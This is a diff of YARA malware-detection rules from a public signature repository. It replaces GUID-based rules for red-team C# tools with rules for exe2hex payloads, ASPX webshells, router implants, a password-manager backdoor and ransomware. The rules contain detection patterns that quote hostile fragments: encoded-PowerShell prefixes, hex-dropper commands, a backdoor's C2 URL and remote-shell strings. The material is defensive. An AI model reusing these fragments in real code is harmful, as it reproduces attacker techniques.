-		logic_hash = "cabb37be30a62ef6055e6b6a8f5cd1b9f51b231d254419a94aedd5ddfb992376"
-		score = 75
-		quality = 85
+		logic_hash = "a9ec7a00e9faee5cc081a2bc86abf8027fcd3cfe590cdd4f2f99425b6723f23f"
+		score = 65
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "9b448062-7219-4d82-9a0a-e784c4b3aa27" ascii wide
-		$typelibguid0up = "9B448062-7219-4D82-9A0A-E784C4B3AA27" ascii wide
+		$ = "::FromBase64String(\"H4s" ascii wide
+		$ = "::FromBase64String(\"TVq" ascii wide
+		$ = "::FromBase64String(\"UEs" ascii wide
+		$ = "::FromBase64String(\"JAB" ascii wide
+		$ = "::FromBase64String(\"SUVY" ascii wide
+		$ = "::FromBase64String(\"SQBFAF" ascii wide
+		$ = "::FromBase64String(\"SQBuAH" ascii wide
+		$ = "::FromBase64String(\"PAA" ascii wide
+		$ = "::FromBase64String(\"cwBhA" ascii wide
+		$ = "::FromBase64String(\"aWV4" ascii wide
+		$ = "::FromBase64String(\"aQBlA" ascii wide
+		$ = "::FromBase64String(\"R2V0" ascii wide
+		$ = "::FromBase64String(\"dmFy" ascii wide
+		$ = "::FromBase64String(\"dgBhA" ascii wide
+		$ = "::FromBase64String(\"dXNpbm" ascii wide
+		$ = "::FromBase64String(\"H4sIA" ascii wide
+		$ = "::FromBase64String(\"Y21k" ascii wide
+		$ = "::FromBase64String(\"Qzpc" ascii wide
+		$ = "::FromBase64String(\"Yzpc" ascii wide
+		$ = "::FromBase64String(\"IAB" ascii wide
+		$ = "::FromBase64String('H4s" ascii wide
+		$ = "::FromBase64String('TVq" ascii wide
+		$ = "::FromBase64String('UEs" ascii wide
+		$ = "::FromBase64String('JAB" ascii wide
+		$ = "::FromBase64String('SUVY" ascii wide
+		$ = "::FromBase64String('SQBFAF" ascii wide
+		$ = "::FromBase64String('SQBuAH" ascii wide
+		$ = "::FromBase64String('PAA" ascii wide
+		$ = "::FromBase64String('cwBhA" ascii wide
+		$ = "::FromBase64String('aWV4" ascii wide
+		$ = "::FromBase64String('aQBlA" ascii wide
+		$ = "::FromBase64String('R2V0" ascii wide
+		$ = "::FromBase64String('dmFy" ascii wide
+		$ = "::FromBase64String('dgBhA" ascii wide
+		$ = "::FromBase64String('dXNpbm" ascii wide
+		$ = "::FromBase64String('H4sIA" ascii wide
+		$ = "::FromBase64String('Y21k" ascii wide
+		$ = "::FromBase64String('Qzpc" ascii wide
+		$ = "::FromBase64String('Yzpc" ascii wide
+		$ = "::FromBase64String('IAB" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpexcel4_DCOM : FILE
+rule SIGNATURE_BASE_Payload_Exe2Hex
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "12d3f26b-40ca-5034-a7c2-9be9c8a7599b"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rvrsh3ll/SharpExcel4-DCOM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2999-L3013"
+		description = "Detects payload generated by exe2hex"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c29e4937-cc6a-5265-a3b9-1018228dc956"
+		date = "2016-01-15"
+		modified = "2023-12-05"
+		reference = "https://github.com/g0tmi1k/exe2hex"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/generic_exe2hex_payload.yar#L8-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "abc87f0ed51f044633ef7854610cd16460eefad570c31c7fe854d245229cceb3"
-		score = 75
+		logic_hash = "91b738f0174a267bbc900d59abcb504d2ae0bac8c287c3b7d1ebfc57374a7ee7"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "68b83ce5-bbd9-4ee3-b1cc-5e9223fab52b" ascii wide
-		$typelibguid0up = "68B83CE5-BBD9-4EE3-B1CC-5E9223FAB52B" ascii wide
+		$a1 = "set /p \"=4d5a" ascii
+		$a2 = "powershell -Command \"$hex=" ascii
+		$b1 = "set+%2Fp+%22%3D4d5" ascii
+		$b2 = "powershell+-Command+%22%24hex" ascii
+		$c1 = "echo 4d 5a " ascii
+		$c2 = "echo r cx >>" ascii
+		$d1 = "echo+4d+5a+" ascii
+		$d2 = "echo+r+cx+%3E%3E" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshooter : FILE
+rule SIGNATURE_BASE_WEBSHELL_Z_Webshell_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a59e6fe9-dbaf-5830-8cf1-485ff4dd939a"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/mdsecactivebreach/SharpShooter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3015-L3029"
+		description = "Detection for the z_webshell"
+		author = "DHS NCCIC Hunt and Incident Response Team"
+		id = "9a54925f-de10-567f-a1ea-5e7522b47dfd"
+		date = "2018-01-25"
+		modified = "2023-12-05"
+		old_rule_name = "z_webshell"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_074A.yar#L9-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8a8510a680205c09321b8d1a960f1b8026883aede5224e8fe541727a434312b4"
+		hash = "2c9095c965a55efc46e16b86f9b7d6c6"
+		logic_hash = "d41aa107e54af5d45531a46d24b24f9f14635dbcb50ed26f7c787883854f961f"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "56598f1c-6d88-4994-a392-af337abe5777" ascii wide
-		$typelibguid0up = "56598F1C-6D88-4994-A392-AF337ABE5777" ascii wide
+		$webshell_name = "public string z_progname =" nocase ascii wide
+		$webshell_password = "public string Password =" nocase ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint32( 0 ) == 0x2040253c or uint32( 0 ) == 0x7073613c ) and filesize < 100KB and 2 of ( $webshell_* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Nomsbuild : FILE
+rule SIGNATURE_BASE_TA18_074A_Screen : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9bc0661d-c60f-582b-8f88-87e3dfa13ddd"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rvrsh3ll/NoMSBuild"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3031-L3047"
+		description = "Detects malware mentioned in TA18-074A"
+		author = "Florian Roth (Nextron Systems)"
+		id = "789ee5e5-83c3-5137-a078-ff230dbf8fcd"
+		date = "2018-03-16"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_074A.yar#L34-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3979162455153d586036960f3cf2a90a893541900245c4184e55631d2138ba75"
+		logic_hash = "e96f70e3d9c7ff5812724111788365c47e2b478a35b39771c12a3d3636a6a020"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$typelibguid0lo = "034a7b9f-18df-45da-b870-0e1cef500215" ascii wide
-		$typelibguid0up = "034A7B9F-18DF-45DA-B870-0E1CEF500215" ascii wide
-		$typelibguid1lo = "59b449d7-c1e8-4f47-80b8-7375178961db" ascii wide
-		$typelibguid1up = "59B449D7-C1E8-4F47-80B8-7375178961DB" ascii wide
+		$s1 = "screen.exe" fullword wide
+		$s2 = "PlatformInvokeUSER32" fullword ascii
+		$s3 = "GetDesktopImageF" fullword ascii
+		$s4 = "PlatformInvokeGDI32" fullword ascii
+		$s5 = "Too many arguments, going to store in current dir" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Teleshadow2 : FILE
+rule SIGNATURE_BASE_TA18_074A_Scripts : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5b22f2c4-0bd1-5a5a-8867-8fbc773d2b44"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/ParsingTeam/TeleShadow2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3049-L3065"
+		description = "Detects malware mentioned in TA18-074A"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4c786098-c5f4-529b-8732-03183dfa94b5"
+		date = "2018-03-16"
+		modified = "2022-08-18"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA18-074A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta18_074A.yar#L53-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "effe10487be132548eb56eb5bfc97f394669a153c9a885e3461e5f9e94bf66f8"
+		logic_hash = "888ddd59b388033604474fc008f830159a9a104683fb052e7497b83118cbb8aa"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f159b71183a69928ba8f26b76772ec504aefeac71021b012bd006162e133731"
 
 	strings:
-		$typelibguid0lo = "42c5c356-39cf-4c07-96df-ebb0ccf78ca4" ascii wide
-		$typelibguid0up = "42C5C356-39CF-4C07-96DF-EBB0CCF78CA4" ascii wide
-		$typelibguid1lo = "0242b5b1-4d26-413e-8c8c-13b4ed30d510" ascii wide
-		$typelibguid1up = "0242B5B1-4D26-413E-8C8C-13B4ED30D510" ascii wide
+		$s1 = "Running -s cmd /c query user on " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 600KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Badpotato : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Xsltransform_Aug21 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8bee12fc-fc29-5256-b559-d914ef202c0c"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/BeichenDream/BadPotato"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3067-L3081"
+		description = "Detects an ASPX webshell utilizing XSL Transformations"
+		author = "Max Altgelt"
+		id = "44254084-a717-59e6-a3ac-eca3c1c864a8"
+		date = "2020-02-23"
+		modified = "2023-12-05"
+		reference = "https://gist.github.com/JohnHammond/cdae03ca5bc2a14a735ad0334dcb93d6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/webshell_xsl_transform.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "52b80fa9f4738fb8d9ce14f2881e19122219a13e9fc3acdf87ed7bfea371ebc4"
+		logic_hash = "3ac0b50adc4c56769d0248e213e9426a22e0f5086bf081da57f835ff1c77b716"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "0527a14f-1591-4d94-943e-d6d784a50549" ascii wide
-		$typelibguid0up = "0527A14F-1591-4D94-943E-D6D784A50549" ascii wide
+		$csharpshell = "Language=\"C#\"" nocase
+		$x1 = "<root>1</root>"
+		$x2 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String("
+		$s1 = "XsltSettings.TrustedXslt"
+		$s2 = "Xml.XmlUrlResolver"
+		$s3 = "FromBase64String(Request[\""
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 500KB and $csharpshell and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lethalhta : FILE
+rule SIGNATURE_BASE_MAL_Passwordstate_Moserware_Backdoor_Apr21_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e8e1ad03-a5f0-5508-b78d-0de7bdaf4704"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/codewhitesec/LethalHTA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3083-L3099"
+		description = "Detects backdoor used in Passwordstate incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "061de3ae-c404-5e4a-a16b-b3b208b1ae7f"
+		date = "2021-04-25"
+		modified = "2023-12-05"
+		reference = "https://thehackernews.com/2021/04/passwordstate-password-manager-update.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_passwordstate_backdoor.yar#L1-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c9957f9e0838c5c708afa1651aedb9c6cb003f53c1ce38b200b1526da8fa3a65"
+		logic_hash = "46bf5b7f4f75997535742021d1d5c2129daae0b3836c08383058e5e5b8e27d93"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c2169ab4a39220d21709964d57e2eafe4b68c115061cbb64507cfbbddbe635c6"
+		hash2 = "f23f9c2aaf94147b2c5d4b39b56514cd67102d3293bdef85101e2c05ee1c3bf9"
 
 	strings:
-		$typelibguid0lo = "784cde17-ff0f-4e43-911a-19119e89c43f" ascii wide
-		$typelibguid0up = "784CDE17-FF0F-4E43-911A-19119E89C43F" ascii wide
-		$typelibguid1lo = "7e2de2c0-61dc-43ab-a0ec-c27ee2172ea6" ascii wide
-		$typelibguid1up = "7E2DE2C0-61DC-43AB-A0EC-C27EE2172EA6" ascii wide
+		$x1 = "https://passwordstate-18ed2.kxcdn.com" wide
+		$s1 = " ProxyUserName, ProxyPassword FROM [SystemSettings]" wide fullword
+		$s2 = "PasswordstateService.Passwordstate.Crypto" wide
+		$s3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari" wide fullword
+		$op1 = { 00 4c 00 4e 00 43 00 4c 00 49 00 31 00 31 00 3b 00 00 17 }
+		$op2 = { 4c 00 49 00 31 00 31 00 3b 00 00 17 50 00 72 00 }
+		$op3 = { 61 00 74 00 65 00 2d 00 31 00 38 00 65 00 64 00 32 00 2e 00 6b 00 78 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpstat : FILE
+rule SIGNATURE_BASE_MAL_LNX_Camarodragon_Sheel_Oct23 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "649c6cc0-e43b-558c-9567-00f352af528b"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/Raikia/SharpStat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3101-L3115"
+		description = "Detects CamaroDragon's tool named sheel"
+		author = "Florian Roth"
+		id = "f6f08c0e-236c-5194-9369-da8fdef4aa21"
+		date = "2023-10-06"
+		modified = "2023-12-05"
+		reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_camaro_dragon_oct23.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8b9193262c5ab6e43d804c964821ab986c038a0ba834b22785e75e846fca649b"
-		score = 75
+		logic_hash = "b06f645b766a099adb71c144bdced70c130735e75d5be6451f71077c7d3a5d19"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a"
 
 	strings:
-		$typelibguid0lo = "ffc5c721-49c8-448d-8ff4-2e3a7b7cc383" ascii wide
-		$typelibguid0up = "FFC5C721-49C8-448D-8FF4-2E3A7B7CC383" ascii wide
+		$x1 = "-h server_ip -p server_port -i update_index[0-4] [-r]" ascii fullword
+		$s1 = "read_ip" ascii fullword
+		$s2 = "open fail.%m" ascii fullword
+		$s3 = "ri:h:p:" ascii fullword
+		$s4 = "update server list success!" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x457f and filesize < 30KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sneakyservice : FILE
+rule SIGNATURE_BASE_MAL_LNX_Camarodragon_Horseshell_Oct23 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d02d34f0-7aa1-5110-b7ea-670b5fb98150"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/malcomvetter/SneakyService"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3117-L3131"
+		description = "Detects CamaroDragon's HorseShell implant for routers"
+		author = "Florian Roth"
+		id = "9e54745f-146f-50a6-b30f-53aaaa6907b5"
+		date = "2023-10-06"
+		modified = "2023-12-05"
+		reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_camaro_dragon_oct23.yar#L27-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf35b2709e6a998ee672681d99f91fe5f452ba612bf0c5d9abe20e93d3cb236e"
-		score = 75
+		logic_hash = "73adaa286b345cffd35e6ba017b3204d8818dcaeea8a48ca93959566461ac3ca"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c"
 
 	strings:
-		$typelibguid0lo = "897819d5-58e0-46a0-8e1a-91ea6a269d84" ascii wide
-		$typelibguid0up = "897819D5-58E0-46A0-8E1A-91EA6A269D84" ascii wide
+		$x1 = "echo \"start shell '%s' failed!\" > .remote_shell.log" ascii fullword
+		$x2 = "*****recv NET_REQ_HORSE_SHELL REQ_CONNECT_PORT*****" ascii fullword
+		$s1 = "m.cremessage.com" ascii fullword
+		$s2 = "POST http://%s/index.php HTTP/1.1" ascii fullword
+		$s3 = "wzsw_encrypt_buf" ascii fullword
+		$s4 = "body:%d-%s" ascii fullword
+		$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident" ascii fullword
+		$s6 = "process_http_read_events" ascii fullword
+		$op1 = { c4 34 42 00 02 30 63 00 40 10 60 00 09 ae 62 00 48 8e 62 00 cc }
+		$op2 = { 27 f4 8c 46 27 f0 03 20 f8 09 00 60 28 21 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x457f and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpexec : FILE
+rule SIGNATURE_BASE_ONHAT_Proxy_Hacktool : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5faff0aa-9ffe-5ac0-b9e0-ca9f79350036"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/anthemtotheego/SharpExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3133-L3147"
+		description = "Detects ONHAT Proxy - Htran like SOCKS hack tool used by Chinese APT groups"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cb18a5b0-dbbd-5dd3-af66-21b8302df6de"
+		date = "2016-05-12"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/p32Ozf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_onhat_proxy.yar#L8-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0a8faa0abbd8654901a5b96dff22a635fd7d429a736fe9406c37e9bb724d2c89"
-		score = 75
+		logic_hash = "d8c088ecdedbd74ca174244c407c3bb27ccd082ec515c62ee19c93e0d45d3f3b"
+		score = 100
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "30b2de0a802a65b4db3a14593126301e6949c1249e68056158b2cc74798bac97"
+		hash2 = "94bda24559713c7b8be91368c5016fc7679121fea5d565d3d11b2bb5d5529340"
+		hash3 = "a26e75fec3b9f7d5a1c3d0ce1e89e4b0befb7a601da0c69a4cf96301921771dd"
+		hash4 = "c202e9d5b99f6137c7c07305c7314e55f52bae832d460c44efc8f2a90ff03615"
+		hash5 = "dded62ad85c0bdd68bcc96f88d8ba42d5ad0ef999911ebdea3f561a4491ebbc6"
+		hash6 = "f0954774c91603fc2595f0ba0727b9af4e80f6f9be7bb629e7fb6ba4309ed4ea"
+		hash7 = "f3906be01d51e2e1ae9b03cd09702b6e0794b9c9fd7dc04024f897e96bb13232"
+		hash8 = "f65ae9ccf988a06a152f27a4c0d7992100a2d9d23d80efe8d8c2a5c9bd78a3a7"
 
 	strings:
-		$typelibguid0lo = "7fbad126-e21c-4c4e-a9f0-613fcf585a71" ascii wide
-		$typelibguid0up = "7FBAD126-E21C-4C4E-A9F0-613FCF585A71" ascii wide
+		$s1 = "INVALID PARAMETERS. TYPE ONHAT.EXE -h FOR HELP INFORMATION." fullword ascii
+		$s2 = "[ONHAT] LISTENS (S, %d.%d.%d.%d, %d) ERROR." fullword ascii
+		$s3 = "[ONHAT] CONNECTS (T, %d.%d.%d.%d, %d.%d.%d.%d, %d) ERROR." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( 1 of ( $s* ) ) ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcom : FILE
+rule SIGNATURE_BASE_MAL_WIN_Megazord_Apr25 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "94da3da4-a8aa-5735-9a04-1f2447a330aa"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rvrsh3ll/SharpCOM"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3149-L3163"
+		description = "This Yara rule from ISH Tecnologia's Heimdall Security Research Team, detects the main components of the Megazord Ransomware"
+		author = "0x0d4y-Icaro Cesar"
+		id = "6225a690-8f54-4a50-a19a-8f7523537228"
+		date = "2025-04-11"
+		modified = "2025-04-16"
+		reference = "https://ish.com.br/wp-content/uploads/2025/04/A-Anatomia-do-Ransomware-Akira-e-sua-expansao-multiplataforma.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_win_megazord_apr25.yar#L1-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c11955ce6a0a56de198b22d3716ce496573374847004a62f4b3a682edaa68ebe"
-		score = 75
+		hash = "fd380db23531bb7bb610a7b32fc2a6d5"
+		logic_hash = "1a73e67b9a43c4f1bbe9f3dbebeb428bbfa705f7c858909a7bbf0673951d677e"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.akira"
 
 	strings:
-		$typelibguid0lo = "51960f7d-76fe-499f-afbd-acabd7ba50d1" ascii wide
-		$typelibguid0up = "51960F7D-76FE-499F-AFBD-ACABD7BA50D1" ascii wide
+		$code_custom_algorithm = { 89 c1 45 31 e6 31 e8 44 31 f0 35 ?? ?? ?? ?? c1 c0 0b 44 31 ff 44 31 ef 31 c7 81 f7 ?? ?? ?? ?? c1 c7 0b 44 31 e3 31 cb 31 fb 81 f3 ?? ?? ?? ?? c1 c3 0b 89 da 31 c2 89 84 24 ?? ?? ?? ?? 44 31 ed 31 d5 89 94 24 ?? ?? ?? ?? 81 f5 ?? ?? ?? ?? c1 c5 0b 41 89 e8 41 31 f8 89 bc 24 ?? ?? ?? ?? 41 31 cf 45 31 c7 44 89 84 24 ?? ?? ?? ?? 41 81 f7 ?? ?? ?? ?? 41 c1 c7 0b 41 31 d4 45 31 fc 41 81 f4 ?? ?? ?? ?? 41 c1 c4 0b 45 31 c5 45 31 e5 41 81 f5 ?? ?? ?? ?? 41 c1 c5 0b 89 9c 24 ?? ?? ?? ?? 31 d9 44 31 f9 44 31 e9 81 f1 ?? ?? ?? ?? c1 c1 0b 41 89 c8 45 31 e0 44 89 a4 24 ?? ?? ?? ?? 89 ac 24 ?? ?? ?? ?? 31 e8 44 31 c0 35 ?? ?? ?? ?? c1 c0 0b 44 89 fa 44 89 bc 24 ?? ?? ?? ?? 31 fa 44 31 ea 31 c2 41 89 c1 81 f2 ?? ?? ?? ?? c1 c2 0b 41 31 d8 41 31 d0 41 81 f0 ?? ?? ?? ?? 41 c1 c0 0b 44 89 e8 44 89 ac 24 ?? ?? ?? ?? 31 e8 44 31 c8 44 31 c0 45 89 c3 35 }
+		$megazord_str_I = "powerranges" ascii
+		$megazord_str_II = "onion" ascii
+		$megazord_str_III = "powershell" ascii
+		$megazord_str_IV = "taskkill" ascii
+		$megazord_str_V = "mal_public_key_bytes" ascii
+		$megazord_str_VI = "runneradmin" ascii
+		$megazord_str_VII = "//rustc" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and $code_custom_algorithm and 5 of ( $megazord_str_* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Inception : FILE
+rule SIGNATURE_BASE_Goldeneye_Ransomware_XLS : FILE
 {
 	meta:
